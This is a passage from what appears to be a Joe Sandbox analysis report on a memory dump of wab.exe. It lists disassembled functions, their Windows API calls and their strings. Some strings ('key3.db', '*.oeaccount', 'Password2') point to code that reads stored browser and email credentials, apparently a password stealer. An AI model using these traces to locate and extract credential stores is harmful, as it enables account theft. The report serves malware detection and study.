                                                                                                                                                                                          • memset.MSVCRT ref: 0040AAB7
                                                                                                                                                                                          • memset.MSVCRT ref: 0040AACD
                                                                                                                                                                                            • Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
                                                                                                                                                                                            • Part of subcall function 00406AD1: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A8D9,?,<item>), ref: 00406AEB
                                                                                                                                                                                            • Part of subcall function 0040A245: _mbscpy.MSVCRT ref: 0040A24A
                                                                                                                                                                                            • Part of subcall function 0040A245: _strlwr.MSVCRT ref: 0040A28D
                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040AB04
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 0040AAD2
                                                                                                                                                                                          • <%s>, xrefs: 0040AAFE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                                                                                                                                                          • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                                          • API String ID: 3699762281-1998499579
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097AB
                                                                                                                                                                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097B9
                                                                                                                                                                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097CA
                                                                                                                                                                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097E1
                                                                                                                                                                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097EA
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00409820
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00409833
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00409846
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00409859
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040986D
                                                                                                                                                                                            • Part of subcall function 004077E4: ??3@YAXPAX@Z.MSVCRT ref: 004077EB
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00406EA5: memset.MSVCRT ref: 00406EC5
                                                                                                                                                                                            • Part of subcall function 00406EA5: GetClassNameA.USER32(?,00000000,000000FF), ref: 00406ED8
                                                                                                                                                                                            • Part of subcall function 00406EA5: _strcmpi.MSVCRT ref: 00406EEA
                                                                                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 00410113
                                                                                                                                                                                          • GetSysColor.USER32(00000005), ref: 0041011B
                                                                                                                                                                                          • SetBkColor.GDI32(?,00000000), ref: 00410125
                                                                                                                                                                                          • SetTextColor.GDI32(?,00C00000), ref: 00410133
                                                                                                                                                                                          • GetSysColorBrush.USER32(00000005), ref: 0041013B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Color$BrushClassModeNameText_strcmpimemset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2775283111-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • BeginDeferWindowPos.USER32(0000000A), ref: 00405F44
                                                                                                                                                                                            • Part of subcall function 004015F3: GetDlgItem.USER32(?,?), ref: 00401603
                                                                                                                                                                                            • Part of subcall function 004015F3: GetClientRect.USER32(?,?), ref: 00401615
                                                                                                                                                                                            • Part of subcall function 004015F3: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 0040167F
                                                                                                                                                                                          • EndDeferWindowPos.USER32(?), ref: 00406003
                                                                                                                                                                                          • InvalidateRect.USER32(?,?,00000001), ref: 0040600E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                                                                                                                                                          • String ID: $
                                                                                                                                                                                          • API String ID: 2498372239-3993045852
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00406A9F: CreateFileA.KERNEL32(R7D,80000000,00000001,00000000,00000003,00000000,00000000,0044368E,?,.8D,00443752,?,?,*.oeaccount,.8D,?), ref: 00406AB1
                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,key3.db,00000143,00000000,C@,004069F3,00000000,?,?,00000000), ref: 0040688C
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 004068B2
                                                                                                                                                                                            • Part of subcall function 00407691: ??3@YAXPAX@Z.MSVCRT ref: 00407698
                                                                                                                                                                                            • Part of subcall function 00407691: ??2@YAPAXI@Z.MSVCRT ref: 004076A6
                                                                                                                                                                                            • Part of subcall function 004072EF: ReadFile.KERNEL32(00000000,?,004436D1,00000000,00000000,?,?,004436D1,?,00000000), ref: 00407306
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                          • String ID: C@$key3.db
                                                                                                                                                                                          • API String ID: 1968906679-1993167907
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 0040BFE7
                                                                                                                                                                                          • SetFocus.USER32(?,?), ref: 0040C06F
                                                                                                                                                                                            • Part of subcall function 0040BFB1: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040BFC0
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FocusMessagePostmemset
                                                                                                                                                                                          • String ID: +_@$l
                                                                                                                                                                                          • API String ID: 3436799508-640399337
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00406D65: memset.MSVCRT ref: 00406D6F
                                                                                                                                                                                            • Part of subcall function 00406D65: _mbscpy.MSVCRT ref: 00406DAF
                                                                                                                                                                                          • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                                                                                                                          • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                                                                                                                          • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                                                                                                                                          • String ID: MS Sans Serif
                                                                                                                                                                                          • API String ID: 3492281209-168460110
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ClassName_strcmpimemset
                                                                                                                                                                                          • String ID: edit
                                                                                                                                                                                          • API String ID: 275601554-2167791130
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: strlen$_mbscat
                                                                                                                                                                                          • String ID: 8D
                                                                                                                                                                                          • API String ID: 3951308622-2703402624
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _mbscat$_mbscpy
                                                                                                                                                                                          • String ID: Password2
                                                                                                                                                                                          • API String ID: 2600922555-1856559283
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(shell32.dll,0041073A,00000104), ref: 0041068C
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 004106A1
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                                                                                          • String ID: SHGetSpecialFolderPathA$shell32.dll
                                                                                                                                                                                          • API String ID: 2574300362-543337301
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                          • String ID: rows deleted
                                                                                                                                                                                          • API String ID: 2221118986-571615504
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy$memcmp
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3384217055-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??2@$memset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1860491036-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$memcpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 368790112-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$memcpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 368790112-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                          • String ID: +MA$psow$winOpen
                                                                                                                                                                                          • API String ID: 2221118986-3077801942
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • too many SQL variables, xrefs: 0042BD54
                                                                                                                                                                                          • variable number must be between ?1 and ?%d, xrefs: 0042BC19
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                          • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                                                                                                                          • API String ID: 2221118986-515162456
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                          • String ID: $, $CREATE TABLE
                                                                                                                                                                                          • API String ID: 3510742995-3459038510
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00410475: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,0040264A,?), ref: 0041048B
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026D6
                                                                                                                                                                                          • memset.MSVCRT ref: 0040269F
                                                                                                                                                                                            • Part of subcall function 0041025A: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410277
                                                                                                                                                                                            • Part of subcall function 0041025A: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410298
                                                                                                                                                                                            • Part of subcall function 0041025A: memcpy.MSVCRT ref: 004102D6
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040278E
                                                                                                                                                                                          • LocalFree.KERNEL32(?), ref: 00402798
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ByteCharFromMultiStringUuidWide$FreeLocalQueryValuememcpymemset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1593657333-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 0040C642
                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C686
                                                                                                                                                                                          • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C6A0
                                                                                                                                                                                          • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040C743
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Message$MenuPostSendStringmemset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3798638045-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00409B5A: ??2@YAPAXI@Z.MSVCRT ref: 00409B7B
                                                                                                                                                                                            • Part of subcall function 00409B5A: ??3@YAXPAX@Z.MSVCRT ref: 00409C42
                                                                                                                                                                                          • strlen.MSVCRT ref: 0040B366
                                                                                                                                                                                          • atoi.MSVCRT ref: 0040B374
                                                                                                                                                                                          • _mbsicmp.MSVCRT ref: 0040B3C7
                                                                                                                                                                                          • _mbsicmp.MSVCRT ref: 0040B3DA
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4107816708-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: strlen
                                                                                                                                                                                          • String ID: >$>$>
                                                                                                                                                                                          • API String ID: 39653677-3911187716
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                          • API String ID: 3510742995-2766056989
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • strlen.MSVCRT ref: 00407709
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00407729
                                                                                                                                                                                            • Part of subcall function 00406CCE: malloc.MSVCRT ref: 00406CEA
                                                                                                                                                                                            • Part of subcall function 00406CCE: memcpy.MSVCRT ref: 00406D02
                                                                                                                                                                                            • Part of subcall function 00406CCE: ??3@YAXPAX@Z.MSVCRT ref: 00406D0B
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040774C
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040776C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??3@$memcpy$mallocstrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1171893557-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1865533344-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SHGetMalloc.SHELL32(?), ref: 00410890
                                                                                                                                                                                          • SHBrowseForFolder.SHELL32(?), ref: 004108C2
                                                                                                                                                                                          • SHGetPathFromIDList.SHELL32(00000000,?), ref: 004108D6
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 004108E9
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: BrowseFolderFromListMallocPath_mbscpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1479990042-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00408B27: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408BF0
                                                                                                                                                                                            • Part of subcall function 00408B27: memcpy.MSVCRT ref: 00408C2F
                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040B684
                                                                                                                                                                                          • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B6E7
                                                                                                                                                                                            • Part of subcall function 00408B27: _mbscpy.MSVCRT ref: 00408BA2
                                                                                                                                                                                            • Part of subcall function 00408B27: strlen.MSVCRT ref: 00408BC0
                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040B6AE
                                                                                                                                                                                          • _mbscat.MSVCRT ref: 0040B6C1
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 203655857-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 0040AB44
                                                                                                                                                                                          • memset.MSVCRT ref: 0040AB5A
                                                                                                                                                                                            • Part of subcall function 0040A245: _mbscpy.MSVCRT ref: 0040A24A
                                                                                                                                                                                            • Part of subcall function 0040A245: _strlwr.MSVCRT ref: 0040A28D
                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040AB84
                                                                                                                                                                                            • Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
                                                                                                                                                                                            • Part of subcall function 00406AD1: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A8D9,?,<item>), ref: 00406AEB
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                                                                                                                                                          • String ID: </%s>
                                                                                                                                                                                          • API String ID: 3699762281-259020660
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

